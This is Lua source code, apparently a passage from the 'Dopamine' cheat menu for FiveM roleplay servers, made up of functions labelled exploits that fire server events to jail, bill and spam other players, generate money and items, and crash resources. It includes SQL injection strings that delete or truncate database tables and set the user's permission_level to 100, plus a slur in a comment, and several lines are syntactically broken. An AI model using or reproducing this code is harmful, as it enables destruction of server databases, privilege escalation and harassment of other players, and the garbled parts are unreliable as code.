- Dopamine.dTCE(false, true, 'esx-qalle-jail:unJailPlayer', target)
- elseif Dopamine.functions.doesResourceExist('esx_jailer') then
- Dopamine.dTCE(false, true, 'esx_jailler:sendToJail', target, 0, 'www.d0pamine', time)
- Dopamine.dTCE(false, true, 'esx_jailer:sendToJail', target, 0, 'www.d0pamine', time)
- elseif Dopamine.functions.doesResourceExist('esx_jail') then
- Dopamine.dTCE(false, true, 'esx_jail:sendToJail', target, 0, 'www.d0pamine')
- else
- Dopamine.pushNotification('Resource was not found!', 5000)
- end
- end
- Dopamine.functions.sPO.communityService = function(target)
- if Dopamine.functions.doesResourceExist('ESX_CommunityService') or Dopamine.functions.doesResourceExist('esx_CommunityService') then
- Dopamine.dTCE(false, true, 'esx_communityservice:sendToCommunityService', target, 5391)
- else
- Dopamine.pushNotification('Resource was not found!', 5000)
- end
- end
- --[[
- Some nice exploits yes?
- ]]
- Dopamine.functions.exploits = {}
- Dopamine.functions.exploits.gcphoneTwitter = function()
- if Dopamine.functions.doesResourceExist('gcPhone') or Dopamine.functions.doesResourceExist('xenknight') then
- pCreateThread(function()
- Dopamine.dTCE(false, true, 'gcPhone:twitter_createAccount', 'd0pamine', 'd0pamine', '')
- pWait(1500)
- Dopamine.dTCE(false, true, 'gcPhone:twitter_login', 'd0pamine', 'd0pamine')
- pWait(1500)
- for i = 1, 50 do
- Dopamine.dTCE(true, true, 'gcPhone:twitter_postTweets', 'd0pamine', 'd0pamine', 'd0pamine > all | Nertigel#5391')
- end
- end)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_license = function()
- if Dopamine.functions.doesResourceExist('esx_license') then
- local licensesToExploit = {
- 'd0pamine',
- 'd0pamine',
- 'Nertigel#5391',
- 'RIP Your SQL Faggot',
- 'Make sure to wipe all tables ;)',
- 'Nertigel Was Here',
- ''
- }
- for i = 0, #licensesToExploit do
- local plist = Dopamine.natives.getActivePlayers()
- for player = 0, #plist do
- Dopamine.dTCE(true, true, 'esx_license:addLicense', player, licensesToExploit[i], function(cb)
- cb(true)
- dir_print('added license '..licensesToExploit[i]..' to '..player)
- end)
- end
- end
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_givelicenses = function()
- if Dopamine.functions.doesResourceExist('esx_license') then
- local licensesToExploit = {
- 'dmv',
- 'drive',
- 'drive_bike',
- 'drive_truck',
- 'weapon'
- }
- for i = 0, #licensesToExploit do
- local plist = Dopamine.natives.getActivePlayers()
- for player = 0, #plist do
- Dopamine.dTCE(true, true, 'esx_license:addLicense', player, licensesToExploit[i], function(cb)
- cb(true)
- dir_print('added license '..licensesToExploit[i])
- end)
- end
- end
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_kashacters = function(player_specific, task, table)
- if Dopamine.functions.doesResourceExist('esx_kashacters') or
- Dopamine.functions.doesResourceExist('esx_Kashacters') or
- Dopamine.functions.doesResourceExist('Kashacters') or
- Dopamine.functions.doesResourceExist('kashacters') then
- if player_specific then
- local player_specific2 = player_specific:gsub('steam', '')
- player_specific2 = 'Char1'..player_specific2
- Dopamine.dTCE(false, true, 'kashactersS:DeleteCharacter', '\';DELETE FROM '..table..' WHERE identifier=\''..player_specific..'\';/')
- Dopamine.dTCE(false, true, 'kashactersS:DeleteCharacter', '\';DELETE FROM '..table..' WHERE identifier=\''..player_specific2..'\';/')
- Dopamine.dTCE(false, true, 'kashactersS:DeleteCharacter', '\';DELETE FROM '..table..' WHERE target=\''..player_specific..'\';/')
- Dopamine.dTCE(false, true, 'kashactersS:DeleteCharacter', '\';DELETE FROM '..table..' WHERE target=\''..player_specific2..'\';/')
- else
- if task == 'clean' then
- Dopamine.dTCE(false, true, 'kashactersS:DeleteCharacter', '\';TRUNCATE TABLE '..table..';/')
- elseif task == 'flood' then
- Dopamine.dTCE(false, true, 'kashactersS:DeleteCharacter', '\';UPDATE users SET permission_level=\'100\' WHERE name=\'' ..NetworkPlayerGetName(PlayerId()) .. '\';/')
- end
- end
- Dopamine.pushNotification('Exploit ran successfully', 15000)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.interactSound = function()
- if Dopamine.functions.doesResourceExist('interactSound') or
- Dopamine.functions.doesResourceExist('InteractSound') or
- Dopamine.functions.doesResourceExist('interact-sound') then
- Dopamine.dTCE(true, true, 'InteractSound_SV:PlayOnAll', 'demo', 99.0)
- Dopamine.dTCE(true, true, 'InteractSound_SV:PlayWithinDistance', 5000.0, 'demo', 98.0)
- Dopamine.dTCE(true, true, 'InteractSound_SV:PlayOnAll', 'cuff', 97.0)
- Dopamine.dTCE(true, true, 'InteractSound_SV:PlayOnAll', 'buckle', 96.0)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.phoneSpam = function()
- if Dopamine.functions.doesResourceExist('esx_phone') or
- Dopamine.functions.doesResourceExist('gcPhone') or
- Dopamine.functions.doesResourceExist('xenknight') then
- Dopamine.dTCE(true, true, 'esx_phone:send', 'police', 'www.d0pamine', true, {x = 1337.0, y = 1337.0, z = 1337.0})
- Dopamine.dTCE(true, true, 'esx_phone:send', 'ambulance', 'www.d0pamine', true, {x = 1337.0, y = 1337.0, z = 1337.0})
- Dopamine.dTCE(true, true, 'esx_phone:send', 'taxi', 'www.d0pamine', true, {x = 1337.0, y = 1337.0, z = 1337.0})
- Dopamine.dTCE(true, true, 'esx_phone:send', 'realestateagent', 'www.d0pamine', true, {x = 1337.0, y = 1337.0, z = 1337.0})
- elseif Dopamine.functions.doesResourceExist('esx_addons_gcphone') then
- Dopamine.dTCE(true, true, 'esx_addons_gcphone:startCall', 'police', 'www.d0pamine', {x = 1337.0, y = 1337.0, z = 1337.0})
- Dopamine.dTCE(true, true, 'esx_addons_gcphone:startCall', 'ambulance', 'www.d0pamine', {x = 1337.0, y = 1337.0, z = 1337.0})
- Dopamine.dTCE(true, true, 'esx_addons_gcphone:startCall', 'taxi', 'www.d0pamine', {x = 1337.0, y = 1337.0, z = 1337.0})
- Dopamine.dTCE(true, true, 'esx_addons_gcphone:startCall', 'realestateagent', 'www.d0pamine', {x = 1337.0, y = 1337.0, z = 1337.0})
- end
- end
- Dopamine.functions.exploits.esx_moneymaker = function()
- if Dopamine.datastore.ESX == nil then Dopamine.pushNotification('ESX was not found.') return end
- local m = Dopamine.trashFunctions.keyboardInput('Enter amount of money', '', 12)
- if not then
- local doloop = Dopamine.trashFunctions.keyboardInput('Enter amount loops', '', 12)
- if not doloop then doloop = 1 end
- Dopamine.functions.exploits.run_esx_moneymaker(m, doloop)
- else
- Dopamine.pushNotification('Please enter a valid amount of money!', 5000)
- end
- end
- Dopamine.functions.exploits.run_esx_moneymaker = function(moneyAmt, loopAmt)
- if Dopamine.datastore.ESX == nil then Dopamine.pushNotification('ESX was not found.') return end
- for iloop = 0, loopAmt do
- if Dopamine.functions.doesResourceExist('disc-base') then
- Dopamine.dTCE(true, true, 'disc-base:givePlayerMoney', moneyAmt)
- Dopamine.dTCE(true, true, 'disc-base:givePlayerDirtyMoney', moneyAmt)
- end
- if Dopamine.functions.doesResourceExist('esx_vangelico_robbery') or Dopamine.functions.doesResourceExist('esx_vangelico') then
- Dopamine.dTCE(true, true, 'esx_vangelico_robbery:gioielli')
- Dopamine.dTCE(true, true, 'esx_vangelico_robbery:gioielli1')
- Dopamine.dTCE(true, true, 'lester:vendita')
- end
- if Dopamine.functions.doesResourceExist('esx_burglary') or Dopamine.functions.doesResourceExist('99kr-burglary') then
- Dopamine.dTCE(true, true, '99kr-burglary:addMoney', moneyAmt)
- Dopamine.dTCE(true, true, 'burglary:money', moneyAmt)
- end
- if Dopamine.functions.doesResourceExist('esx_minerjob') or Dopamine.functions.doesResourceExist('esx_miner') or Dopamine.functions.doesResourceExist('esx_mining') then
- Dopamine.dTCE(true, true, 'esx_mining:getItem')
- Dopamine.dTCE(true, true, 'esx_mining:sell')
- end
- if Dopamine.functions.doesResourceExist('esx_fishing') or Dopamine.functions.doesResourceExist('loffe-fishing') or Dopamine.functions.doesResourceExist('james_fishing') then
- Dopamine.dTCE(true, true, 'esx_fishing:caughtFish')
- Dopamine.dTCE(true, true, 'loffe-fishing:giveFish')
- Dopamine.dTCE(true, true, 'loffe-fishing:sellFish')
- Dopamine.datastore.ESX.TriggerServerCallback('james_fishing:receiveFish', function(received)
- if received then
- dir_print('received fish')
- end
- end)
- Dopamine.datastore.ESX.TriggerServerCallback('james_fishing:sellFish', function(sold, fishesSold)
- if sold then
- dir_print('sold '..fishesSold)
- end
- end)
- end
- if Dopamine.functions.doesResourceExist('esx_mugging') then
- Dopamine.dTCE(true, true, 'esx_mugging:giveMoney', moneyAmt)
- end
- if Dopamine.functions.doesResourceExist('loffe_robbery') then
- Dopamine.dTCE(true, true, 'loffe_robbery:pickUp', iloop)
- end
- if Dopamine.functions.doesResourceExist('esx_prisonwork') or Dopamine.functions.doesResourceExist('loffe_prisonwork') then
- Dopamine.dTCE(true, true, 'esx_loffe_fangelse:Pay')
- end
- if Dopamine.functions.doesResourceExist('esx_robnpc') then
- Dopamine.dTCE(true, true, 'esx_robnpc:giveMoney')
- end
- if Dopamine.functions.doesResourceExist('MF_DrugSales') or Dopamine.functions.doesResourceExist('MF_drugsales') or Dopamine.functions.doesResourceExist('ESX_DrugSales') then
- Dopamine.dTCE(true, true, 'MF_DrugSales:Sold', 'water', moneyAmt, iloop)
- end
- if Dopamine.functions.doesResourceExist('lenzh_chopshop') or Dopamine.functions.doesResourceExist('esx_chopshop') then
- Dopamine.dTCE(true, true, 'lenzh_chopshop:rewards')
- Dopamine.dTCE(true, true, 'lenzh_chopshop:sell', 'battery', 5)
- Dopamine.dTCE(true, true, 'lenzh_chopshop:sell', 'lowradio', 5)
- Dopamine.dTCE(true, true, 'lenzh_chopshop:sell', 'stockrim', 5)
- Dopamine.dTCE(true, true, 'lenzh_chopshop:sell', 'highrim', 5)
- Dopamine.dTCE(true, true, 'lenzh_chopshop:sell', 'highradio', 5)
- Dopamine.dTCE(true, true, 'lenzh_chopshop:sell', 'airbag', 5)
- end
- if Dopamine.functions.doesResourceExist('ESX_Deliveries') then
- Dopamine.dTCE(true, true, 'esx_deliveries:AddCashMoney', moneyAmt)
- Dopamine.dTCE(true, true, 'esx_deliveries:AddBankMoney', moneyAmt)
- Dopamine.dTCE(true, true, 'esx_deliveries:finishDelivery:server')
- end
- if Dopamine.functions.doesResourceExist('ESX_Cargodelivery') then
- Dopamine.datastore.ESX.TriggerServerCallback('esx_cargodelivery:sellCargo', function(received)
- if received then
- dir_print('received '..moneyAmt)
- end
- end, moneyAmt)
- end
- if Dopamine.functions.doesResourceExist('napadtransport') or Dopamine.functions.doesResourceExist('Napad_transport_z_gotowka') or Dopamine.functions.doesResourceExist('esx_truck_robbery') then
- Dopamine.dTCE(true, true, 'napadtransport:graczZrobilnapad')
- end
- if Dopamine.functions.doesResourceExist('napadnakase') or Dopamine.functions.doesResourceExist('Napad_na_kase') then
- Dopamine.dTCE(true, true, 'tost:zgarnijsiano')
- end
- if Dopamine.functions.doesResourceExist('utk_oh') or Dopamine.functions.doesResourceExist('utk_ornateheist') or Dopamine.functions.doesResourceExist('aurora_principalbank') then
- Dopamine.dTCE(true, true, 'utk_oh:rewardCash')
- Dopamine.dTCE(true, true, 'utk_oh:rewardGold')
- Dopamine.dTCE(true, true, 'utk_oh:rewardDia')
- Dopamine.dTCE(true, true, 'utk_oh:giveidcard')
- end
- --[[local jobsToExploit = {
- 'esx_hunting',
- 'esx_qalle_hunting',
- 'esx-qalle-hunting',
- 'esx_taxijob',
- 'esx_taxi',
- 'esx_carthiefjob',
- 'esx_carthief',
- 'esx_rangerjob',
- 'esx_ranger',
- 'esx_godirtyjob',
- 'esx_godirty',
- 'esx_banksecurityjob',
- 'esx_banksecurity',
- 'esx_pilotjob',
- 'esx_pilot',
- 'esx_pizzajob',
- 'esx_pizza',
- 'esx_gopostaljob',
- 'esx_gopostal',
- 'esx_garbagejob',
- 'esx_garbage',
- 'esx_truckerjob',
- 'esx_trucker'
- }
- local jTEsuffix = {
- ':pay',
- ':finish',
- ':finishJob',
- ':reward',
- ':sell',
- ':success'
- }
- pCreateThread(function()
- for i=1, #jobsToExploit do
- if Dopamine.functions.doesResourceExist(jobsToExploit[i]) then
- for suff=1, #jTEsuffix do
- pWait(50)
- Dopamine.dTCE(true, true, jobsToExploit[i]..jTEsuffix[suff], moneyAmt)
- end
- end
- end
- end)]]
- end
- end
- Dopamine.functions.exploits.esx_give_something = function(item_type, item_name, item_amount)
- local plist = Dopamine.natives.getActivePlayers()
- for i=1, #plist do
- Dopamine.dTCE(true, true, 'esx:giveInventoryItem', GetPlayerServerId(plist[i]), item_type, item_name, item_amount)
- end
- end
- Dopamine.functions.exploits.esx_moneywash = function()
- local m = Dopamine.trashFunctions.keyboardInput('Enter amount of money', '', 12)
- if not then
- if Dopamine.functions.doesResourceExist('esx_blanchisseur') or Dopamine.functions.doesResourceExist('esx_moneywash') then
- Dopamine.dTCE(true, true, 'esx_blanchisseur:washMoney', m)
- Dopamine.dTCE(true, true, 'esx_moneywash:washMoney', m)
- Dopamine.dTCE(true, true, 'esx_moneywash:withdraw', m)
- end
- else
- Dopamine.pushNotification('Please enter a valid amount of money!', 5000)
- end
- end
- Dopamine.functions.exploits.esx_harvest_stop = function()
- if Dopamine.functions.doesResourceExist('esx_drugs') then
- Dopamine.dTCE(true, true, 'esx_drugs:stopHarvestWeed')
- Dopamine.dTCE(true, true, 'esx_drugs:stopTransformWeed')
- Dopamine.dTCE(true, true, 'esx_drugs:stopHarvestOpium')
- Dopamine.dTCE(true, true, 'esx_drugs:stopTransformOpium')
- Dopamine.dTCE(true, true, 'esx_drugs:stopHarvestMeth')
- Dopamine.dTCE(true, true, 'esx_drugs:stopTransformMeth')
- Dopamine.dTCE(true, true, 'esx_drugs:stopHarvestCoke')
- Dopamine.dTCE(true, true, 'esx_drugs:stopTransformCoke')
- end
- if Dopamine.functions.doesResourceExist('esx_illegal_drugs') then
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopHarvestWeed')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopTransformWeed')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopHarvestOpium')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopTransformOpium')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopHarvestMeth')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopTransformMeth')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopHarvestCoke')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:stopTransformCoke')
- end
- if Dopamine.functions.doesResourceExist('esx_mechanicjob') then
- Dopamine.dTCE(true, true, 'esx_mechanicjob:stopHarvest')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:stopHarvest2')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:stopHarvest3')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:stopCraft')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:stopCraft2')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:stopCraft3')
- end
- if Dopamine.functions.doesResourceExist('esx_mecanojob') then
- Dopamine.dTCE(true, true, 'esx_mecanojob:stopHarvest')
- Dopamine.dTCE(true, true, 'esx_mecanojob:stopHarvest2')
- Dopamine.dTCE(true, true, 'esx_mecanojob:stopHarvest3')
- Dopamine.dTCE(true, true, 'esx_mecanojob:stopCraft')
- Dopamine.dTCE(true, true, 'esx_mecanojob:stopCraft2')
- Dopamine.dTCE(true, true, 'esx_mecanojob:stopCraft3')
- end
- end
- Dopamine.functions.exploits.esx_outlawalert = function()
- if Dopamine.functions.doesResourceExist('esx_outlawalert') then
- Dopamine.dTCE(true, true, 'esx_outlawalert:gunshotInProgress', { x = 1337, y = 1337, z = 1337 }, 'd0pamine', 0)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_billing = function()
- if Dopamine.functions.doesResourceExist('esx_billing') then
- local billName = Dopamine.trashFunctions.keyboardInput('Enter bill name', 'd0pamine', 32)
- local billAmount = Dopamine.trashFunctions.keyboardInput('Enter bill amount', '', 16)
- for i=0, #Dopamine.natives.getActivePlayers() do
- if then billName = 'd0pamine > all' end
- if then billAmount = 5391 end
- Dopamine.dTCE(true, true, 'esx_billing:sendBill', GetPlayerServerId(i), 'd0pamine', billName, billAmount)
- end
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_policejob_crash = function()
- if Dopamine.functions.doesResourceExist('esx_policejob') then
- pCreateThread(function()
- for i = 1, 50, 1 do
- Dopamine.dTCE(true, true, 'esx_policejob:spawned')
- end
- end)
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_spawncustomitem = function()
- local itemName = Dopamine.trashFunctions.keyboardInput('Enter Item Name', '', 15)
- if Dopamine.functions.doesResourceExist('esx_jobs') then
- if not then
- local ItemData = {
- { name = itemName, db_name = itemName, time = 100, max = 100, add = 1, remove = 10, drop = 100, requires = 'nothing', requires_name = 'Nothing' }
- }
- pCreateThread(function()
- Dopamine.dTCE(false, true, 'esx_jobs:startWork', ItemData)
- pWait(100)
- Dopamine.dTCE(false, true, 'esx_jobs:stopWork', ItemData)
- end)
- end
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- local jobsToExploit = {
- 'esx_mechanicjob',
- 'esx_mecanojob',
- 'esx_taxijob',
- 'esx_vehicleshop',
- 'esx_gangjob',
- 'esx_mafiajob',
- 'esx_carteljob',
- 'esx_bikerjob'
- }
- if not then
- for i=1, #jobsToExploit do
- if Dopamine.functions.doesResourceExist(jobsToExploit[i]) then
- pCreateThread(function()
- Dopamine.dTCE(true, true, jobsToExploit[i]..':getStockItem', itemName, 100)
- Dopamine.dTCE(true, true, jobsToExploit[i]..':putStockItems', itemName, -100)
- end)
- end
- end
- end
- end
- Dopamine.functions.exploits.esx_spawncustomitems = function()
- if Dopamine.functions.doesResourceExist('esx_jobs') then
- local item = Dopamine.menuTables.customExploitableItems.Item[selectedESXCustomItemSpawn]
- local JobDB = Dopamine.menuTables.customExploitableItems.ItemDatabase[item]
- if type(JobDB) == 'table' then
- pCreateThread(function()
- for key, value in pairs(JobDB) do
- local ItemRequired = Dopamine.menuTables.customExploitableItems.ItemRequires[key]
- local ItemData = {
- { name = key, db_name = value, time = 100, max = 1337, add = 1, remove = 10, drop = 100, requires = ItemRequired and JobDB[ItemRequired] or 'nothing', requires_name = ItemRequired and ItemRequired or 'Nothing' }
- }
- pCreateThread(function()
- Dopamine.dTCE(false, true, 'esx_jobs:startWork', ItemData)
- pWait(1000)
- Dopamine.dTCE(false, true, 'esx_jobs:stopWork', ItemData)
- end)
- pWait(3000)
- end
- end)
- else
- local ItemRequired = Dopamine.menuTables.customExploitableItems.ItemRequires[item];
- local ItemData = {
- { name = item, db_name = JobDB, time = 100, max = 100, add = 1, remove = 10, drop = 100, requires = ItemRequired and Dopamine.menuTables.customExploitableItems.ItemDatabase[ItemRequired] or 'nothing', requires_name = ItemRequired and ItemRequired or 'Nothing' }
- }
- pCreateThread(function()
- Dopamine.dTCE(false, true, 'esx_jobs:startWork', ItemData)
- pWait(100)
- Dopamine.dTCE(false, true, 'esx_jobs:stopWork', ItemData)
- end)
- end
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_jobitems = function()
- if Dopamine.functions.doesResourceExist('esx_jobs') then
- local item = Dopamine.menuTables.exploitableJobsTable.Item[selectedESXItemSpawn]
- local JobDB = Dopamine.menuTables.exploitableJobsTable.ItemDatabase[item]
- if type(JobDB) == 'table' then
- pCreateThread(function()
- for key, value in pairs(JobDB) do
- local ItemRequired = Dopamine.menuTables.exploitableJobsTable.ItemRequires[key]
- local ItemData = {
- { name = key, db_name = value, time = 100, max = 1337, add = 10, remove = 10, drop = 100, requires = ItemRequired and JobDB[ItemRequired] or 'nothing', requires_name = ItemRequired and ItemRequired or 'Nothing' }
- }
- pCreateThread(function()
- Dopamine.dTCE(false, true, 'esx_jobs:startWork', ItemData)
- pWait(1000)
- Dopamine.dTCE(false, true, 'esx_jobs:stopWork', ItemData)
- end)
- pWait(3000)
- end
- end)
- else
- local ItemRequired = Dopamine.menuTables.exploitableJobsTable.ItemRequires[item]
- local ItemData = {
- { name = item, db_name = JobDB, time = 100, max = 1337, add = 10, remove = 10, drop = 100, requires = ItemRequired and Dopamine.menuTables.exploitableJobsTable.ItemDatabase[ItemRequired] or 'nothing', requires_name = ItemRequired and ItemRequired or 'Nothing' }
- }
- pCreateThread(function()
- Dopamine.dTCE(false, true, 'esx_jobs:startWork', ItemData)
- pWait(100)
- Dopamine.dTCE(false, true, 'esx_jobs:stopWork', ItemData)
- end)
- end
- else Dopamine.pushNotification('Resource was not found!', 5000) end
- end
- Dopamine.functions.exploits.esx_harvestitems = function()
- if selectedESXHarvestItem == 1 then
- if Dopamine.functions.doesResourceExist('esx_drugs') then
- Dopamine.dTCE(true, true, 'esx_drugs:startHarvestWeed')
- Dopamine.dTCE(true, true, 'esx_drugs:startTransformWeed')
- Dopamine.dTCE(true, true, 'esx_drugs:pickedUpCannabis')
- Dopamine.dTCE(true, true, 'esx_drugs:processCannabis')
- elseif Dopamine.functions.doesResourceExist('esx_illegal_drugs') then
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startHarvestWeed')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startTransformWeed')
- end
- elseif selectedESXHarvestItem == 2 then
- if Dopamine.functions.doesResourceExist('esx_drugs') then
- Dopamine.dTCE(true, true, 'esx_drugs:startHarvestOpium')
- Dopamine.dTCE(true, true, 'esx_drugs:startTransformOpium')
- elseif Dopamine.functions.doesResourceExist('esx_illegal_drugs') then
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startHarvestOpium')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startTransformOpium')
- end
- elseif selectedESXHarvestItem == 3 then
- if Dopamine.functions.doesResourceExist('esx_drugs') then
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startHarvestMeth')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startTransformMeth')
- elseif Dopamine.functions.doesResourceExist('esx_illegal_drugs') then
- Dopamine.dTCE(true, true, 'esx_drugs:startHarvestMeth')
- Dopamine.dTCE(true, true, 'esx_drugs:startTransformMeth')
- end
- elseif selectedESXHarvestItem == 4 then
- if Dopamine.functions.doesResourceExist('esx_drugs') then
- Dopamine.dTCE(true, true, 'esx_drugs:startHarvestCoke')
- Dopamine.dTCE(true, true, 'esx_drugs:startTransformCoke')
- elseif Dopamine.functions.doesResourceExist('esx_illegal_drugs') then
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startHarvestCoke')
- Dopamine.dTCE(true, true, 'esx_illegal_drugs:startTransformCoke')
- elseif Dopamine.functions.doesResourceExist('erratic_coke') then
- Dopamine.dTCE(true, true, 'coke:GiveItem')
- Dopamine.dTCE(true, true, 'coke:GiveItem')
- Dopamine.dTCE(true, true, 'coke:processed')
- end
- end
- if selectedESXHarvestItem == 5 then
- if Dopamine.functions.doesResourceExist('esx_mechanicjob') then
- Dopamine.dTCE(true, true, 'esx_mechanicjob:startHarvest')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:startCraft')
- elseif Dopamine.functions.doesResourceExist('esx_mecanojob') then
- Dopamine.dTCE(true, true, 'esx_mecanojob:startHarvest')
- Dopamine.dTCE(true, true, 'esx_mecanojob:startCraft')
- end
- elseif selectedESXHarvestItem == 6 then
- if Dopamine.functions.doesResourceExist('esx_mechanicjob') then
- Dopamine.dTCE(true, true, 'esx_mechanicjob:startHarvest2')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:startCraft2')
- elseif Dopamine.functions.doesResourceExist('esx_mecanojob') then
- Dopamine.dTCE(true, true, 'esx_mecanojob:startHarvest2')
- Dopamine.dTCE(true, true, 'esx_mecanojob:startCraft2')
- end
- elseif selectedESXHarvestItem == 7 then
- if Dopamine.functions.doesResourceExist('esx_mechanicjob') then
- Dopamine.dTCE(true, true, 'esx_mechanicjob:startHarvest3')
- Dopamine.dTCE(true, true, 'esx_mechanicjob:startCraft3')
- elseif Dopamine.functions.doesResourceExist('esx_mecanojob') then
- Dopamine.dTCE(true, true, 'esx_mecanojob:startHarvest3')
- Dopamine.dTCE(true, true, 'esx_mecanojob:startCraft3')
- end
- end
- end
- Dopamine.functions.exploits.esx_spam_server_console = function()
- if Dopamine.datastore.ESX ~= nil then
- for i = 4, 9 do
- Dopamine.datastore.ESX.TriggerServerCallback('^'..i..'d'..'opamine'..math.random(5000, 10000), function(players)
- end)
- end
- else
- Dopamine.pushNotification('ESX was not found', 5000)
- end
- end
- --[[
- Game functions(text, math, etc).
- ]]
- = {}
- = function(str)
- return str == nil or str == ''
- end
- = function(message, duration, drawImmediately)
- if duration == nil then
- duration = 2500
- end
- if drawImmediately == nil then
- drawImmediately = true
- end
- ClearPrints()
- SetTextEntry_2('STRING')
- for i = 1, message:len(), 99 do
- Dopamine.natives.addTextComponentSubstringPlayerName(string.sub(message, i, i + 99))
- end
- DrawSubtitleTimed(duration, drawImmediately)
- end
- = function()
- local vehicles = {}
- for vehicle in Dopamine.trashFunctions.enumVehicles() do
- table.insert(vehicles, vehicle)
- end
- return vehicles
- end
- = function(coords, area)
- local vehicles =
- local vehiclesInArea = {}
- for i = 1, #vehicles, 1 do
- local vehicleCoords = GetEntityCoords(vehicles[i])
- local distance = GetDistanceBetweenCoords(vehicleCoords, coords.x, coords.y, coords.z, true)
- if distance <= area then
- table.insert(vehiclesInArea, vehicles[i])
- end
- end
- return vehiclesInArea
- end
- = function(base, sub, car, dens, size)
- all_part = {}
- for i = 0,dens do
- UseParticleFxAssetNextCall(base)
- W1 = StartParticleFxLoopedOnEntityBone(sub, car, 0.05, 0, 0, 0, 0, 0, GetEntityBoneIndexByName(car, 'wheel_lr'), size, 0, 0, 0)
- UseParticleFxAssetNextCall(base)
- W2 = StartParticleFxLoopedOnEntityBone(sub, car, 0.05, 0, 0, 0, 0, 0, GetEntityBoneIndexByName(car, 'wheel_rr'), size, 0, 0, 0)
- table.insert(all_part, 1, W1)
- table.insert(all_part, 2, W2)
- end
- pWait(1000)
- for _,W1 in pairs(all_part) do
- StopParticleFxLooped(W1, true)
- end
- end
- = function(veh)
- if not veh then return false end
- local vx,vy,vz = table.unpack(GetEntityVelocity(veh))
- local modV = math.sqrt(vx*vx + vy*vy)
- local rx,ry,rz = table.unpack(GetEntityRotation(veh,0))
- local sn,cs = -math.sin(math.rad(rz)), math.cos(math.rad(rz))
- if GetEntitySpeed(veh)* 3.6 < 5 or GetVehicleCurrentGear(veh) == 0 then return 0,modV end
- local cosX = (sn*vx + cs*vy)/modV
- if cosX > 0.966 or cosX < 0 then return 0,modV end
- return math.deg(math.acos(cosX))*0.5, modV
- end
- Dopamine.functions.initializeUpgradesTab = function()
- local currentVehicle = Dopamine.datastore.pLocalPlayer.cVehicle
- if currentVehicle then
- for i, actual_i in pairs(Dopamine.menuTables.vehiclePerformanceTable) do
- if Dopamine.menuButton(,'vehicleLosSantosCustomsPerformance' then
- end
- end
- --[[SetVehicleModKit(currentVehicle, 0)
- local modType = 15
- local modName = 'Suspension Level '
- local modCount = GetNumVehicleMods(currentVehicle, modType) - 1
- for i=0, modCount, 1 do
- if Dopamine.button(modName..i, 'Native') then
- SetVehicleMod(currentVehicle, modType, i)
- end
- end]]
- end
- end
- = function(vehicle)
- if DoesEntityExist(vehicle) then
- local colorPrimary, colorSecondary = GetVehicleColours(vehicle)
- local pearlescentColor, wheelColor = GetVehicleExtraColours(vehicle)
- local extras = {}
- for id=0, 12 do
- if Dopamine.natives.doesExtraExist(vehicle, id) then
- local state = IsVehicleExtraTurnedOn(vehicle, id) == 1
- extras[tostring(id)] = state
- end
- end
- return {
- model = GetEntityModel(vehicle),
- plate = Dopamine.functions.Math.Trim(GetVehicleNumberPlateText(vehicle)),
- plateIndex = GetVehicleNumberPlateTextIndex(vehicle),
- bodyHealth = Dopamine.functions.Math.Round(GetVehicleBodyHealth(vehicle), 1),
- engineHealth = Dopamine.functions.Math.Round(GetVehicleEngineHealth(vehicle), 1),
- fuelLevel = Dopamine.functions.Math.Round(GetVehicleFuelLevel(vehicle), 1),
- dirtLevel = Dopamine.functions.Math.Round(GetVehicleDirtLevel(vehicle), 1),
- color1 = colorPrimary,
- color2 = colorSecondary,
- pearlescentColor = pearlescentColor,
- wheelColor = wheelColor,
- wheels = GetVehicleWheelType(vehicle),
- windowTint = GetVehicleWindowTint(vehicle),
- xenonColor = Dopamine.natives.getVehicleXenonLightsColour(vehicle),
- neonEnabled = {
- IsVehicleNeonLightEnabled(vehicle, 0),
- IsVehicleNeonLightEnabled(vehicle, 1),
- IsVehicleNeonLightEnabled(vehicle, 2),
- IsVehicleNeonLightEnabled(vehicle, 3)
- },
- neonColor = table.pack(GetVehicleNeonLightsColour(vehicle)),
- extras = extras,
- tyreSmokeColor = table.pack(GetVehicleTyreSmokeColor(vehicle)),
- modSpoilers = GetVehicleMod(vehicle, 0),
- modFrontBumper = GetVehicleMod(vehicle, 1),
- modRearBumper = GetVehicleMod(vehicle, 2),
- modSideSkirt = GetVehicleMod(vehicle, 3),
- modExhaust = GetVehicleMod(vehicle, 4),
- modFrame = GetVehicleMod(vehicle, 5),
- modGrille = GetVehicleMod(vehicle, 6),
- modHood = GetVehicleMod(vehicle, 7),
- modFender = GetVehicleMod(vehicle, 8),
